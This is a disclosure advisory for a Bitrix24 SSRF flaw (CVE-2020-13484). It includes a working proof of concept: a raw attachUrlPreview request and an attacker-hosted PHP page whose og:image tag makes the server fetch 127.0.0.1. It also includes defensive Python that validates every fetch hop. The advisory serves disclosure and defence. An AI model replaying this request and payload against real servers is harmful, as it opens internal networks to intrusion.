Last active June 29, 2020 11:56
CVE-2020-13484
------------------------------------------
Bitrix24 up to 20.0.975 allows SSRF to intranet IP addresses via the url parameter of services/main/ajax.php?action=attachUrlPreview. If the destination URL hosts an HTML document containing '<meta name="og:image" content="', the Bitrix core follows the content URL of that meta tag.
------------------------------------------
[Additional Information]
The first vulnerability allows triggering server-side request forgery to remote addresses. A second vulnerability in the same functionality lets us bypass the restrictions and generate another request that evades the local-IP block policy. We were able to generate requests against the internal infrastructure.
In the first stage we found an SSRF that allowed only remote requests to be sent. Then we manipulated the parser to parse our HTML page and generate a second request, from the server side, to the internal Bitrix core. Bitrix parses og:image tags, so we could trigger a second SSRF this way. The second request was not properly checked for "local" IPs.
To generate the SSRF we send the following request:
POST /bitrix/services/main/ajax.php?action=attachUrlPreview&show_actions=y&buildd_preview=y&die_step=3&admin_section=Y&show_cache_stat1=Y&clear_cache=Y&c=bitrix:main.urlpreview&mode=ajax&=&sessid=bd277e27ef185f42bebbb1d538e66574&signedParamsString=1.12&listSubscribeId[]=1&itemId=1&deleteSubscribe=Y&userFieldId=0&elementId=1 HTTP/1.1
Host: 192.168.1.24
Origin: http://192.168.1.24
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36
Bx-ajax: true
Accept: */*
Referer: http://192.168.1.24/stream/
Accept-Encoding: gzip, deflate
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: BITRIX_SM_TIME_ZONE=-120; BITRIX_SM_SALE_UID=0; BITRIX_SM_SOUND_LOGIN_PLAYED=Y; PHPSESSID=btu7cck1irm51hsgs45akh5dma; BITRIX_SM_NCC=Y; BITRIX_SM_LOGIN=admin; BITRIX_SM_LAST_SETTINGS=;show_cache_stat=Y
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
url=http://OurVPSHost/index.php?id=1
The index.php file on the "OurVPSHost" host:
---------------------------------
<?php header('Content-Type:text/html'); ?>
<meta name="og:image" content="http://127.0.0.1/fake_img.php"/>
---------------------------------
The vulnerability then sends a second SSRF. While the first request was not allowed to target internal addresses, the HTML parser parsed our og:image tag and sent an internal request by redirecting the Bitrix server to 127.0.0.1/fake_img.php. This way we were able to bypass the restrictions of the Bitrix core.
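The root cause described above is that the og:image URL pulled out of the fetched page was never put through the same local-address policy as the first-hop URL. The following Python module is an added illustration of the defensive check, not Bitrix code: one outbound policy applied to the first URL and to every og:image URL the page would make the server follow. The hostnames, the resolver table, and the sample HTML are constructed for the example; the loopback and 192.168.1.24 addresses are the ones the PoC uses.

```python
"""Added illustration (not Bitrix code): validate every hop of a URL preview."""
import ipaddress
import socket
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

ALLOWED_SCHEMES = {"http", "https"}

# Constructed resolver table so the example runs offline. A real fetcher
# resolves with socket.getaddrinfo and must validate EVERY returned address.
FAKE_DNS = {
    "ourvpshost.example": ["93.184.216.34"],  # attacker's public host (constructed)
    "localtest.example": ["127.0.0.1"],        # public name pointing at loopback
    "intranet.example": ["192.168.1.24"],      # internal host (address from the PoC)
}

# Constructed copy of the page served by "OurVPSHost" in the advisory.
SAMPLE_HTML = '<meta name="og:image" content="http://127.0.0.1/fake_img.php"/>'


def is_blocked_ip(ip_text: str) -> bool:
    """True for any address the preview fetcher must never contact.
    'Not globally routable' rejects loopback, RFC 1918, link-local,
    multicast, unspecified and reserved ranges in a single check."""
    ip = ipaddress.ip_address(ip_text)
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # ::ffff:127.0.0.1 must be judged as 127.0.0.1
    return not ip.is_global


def resolve(host: str, resolver=None):
    """All addresses for host; an IP literal maps to itself."""
    try:
        return [str(ipaddress.ip_address(host))]
    except ValueError:
        pass  # not a literal, look it up
    if resolver is not None:
        return list(resolver.get(host, []))
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def check_target(url: str, resolver=None):
    """Apply the outbound policy to ONE URL. Returns (allowed, reason)."""
    parts = urlparse(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    addrs = resolve(host, resolver)
    if not addrs:
        return False, f"{host} does not resolve"
    for addr in addrs:
        if is_blocked_ip(addr):
            return False, f"{host} resolves to non-public address {addr}"
    return True, "ok"


class OgImageParser(HTMLParser):
    """Collect content= of every <meta name|property="og:image">."""

    def __init__(self):
        super().__init__()
        self.images = []

    def handle_starttag(self, tag, attrs):
        if tag != "meta":
            return
        a = dict(attrs)
        is_og = a.get("name") == "og:image" or a.get("property") == "og:image"
        if is_og and a.get("content"):
            self.images.append(a["content"])


def extract_og_images(html: str):
    parser = OgImageParser()
    parser.feed(html)
    return parser.images


def plan_preview(url: str, html: str, resolver=None) -> dict:
    """Check the first hop, then every og:image URL with the SAME policy.
    The second check is the one the advisory says was missing; redirect
    targets would be checked the same way before being followed."""
    allowed, reason = check_target(url, resolver)
    result = {"url": url, "allowed": allowed, "reason": reason, "images": []}
    if not allowed:
        return result
    for img in extract_og_images(html):
        img_url = urljoin(url, img)  # og:image may be relative to the page
        ok, why = check_target(img_url, resolver)
        result["images"].append({"url": img_url, "allowed": ok, "reason": why})
    return result


if __name__ == "__main__":
    print(plan_preview("http://ourvpshost.example/index.php?id=1", SAMPLE_HTML, FAKE_DNS))
```

Run against the constructed page, the first hop passes and the og:image hop is refused with "127.0.0.1 resolves to non-public address 127.0.0.1". Two points matter in a real deployment: connect to the address that was validated (pin it) rather than resolving a second time, so a DNS answer cannot change between check and connect, and treat each HTTP redirect as a new hop that goes through check_target before it is followed.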
------------------------------------------
[VulnerabilityType Other]
Unauthorized server-side request forgery, bypass of the domain whitelist
------------------------------------------
[Vendor of Product]
1c-bitrix.ru, bitrix24.net
------------------------------------------
[Affected Product Code Base]
Bitrix and Bitrix Cloud instances are affected up to the security update (main 20.0.975); reported and fixed in the latest patch
------------------------------------------
[Affected Component]
Main core URLPreview function
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[CVE Impact Other]
Forced server-side request forgery
------------------------------------------
[Attack Vectors]
To exploit the vulnerability an attacker must have access to the website, a valid unauthenticated session and a CSRF token; all can be generated without any privileges. No additional requirements are needed.
------------------------------------------
[Has vendor confirmed or acknowledged the vulnerability?]
true
------------------------------------------
[Discoverer]
Mariusz Popławski (afine.pl)
------------------------------------------
[Reference]
https://www.bitrix24.com/prices/self-hosted.php
https://www.bitrix24.com/security/
Mariusz Popławski / AFINE.com team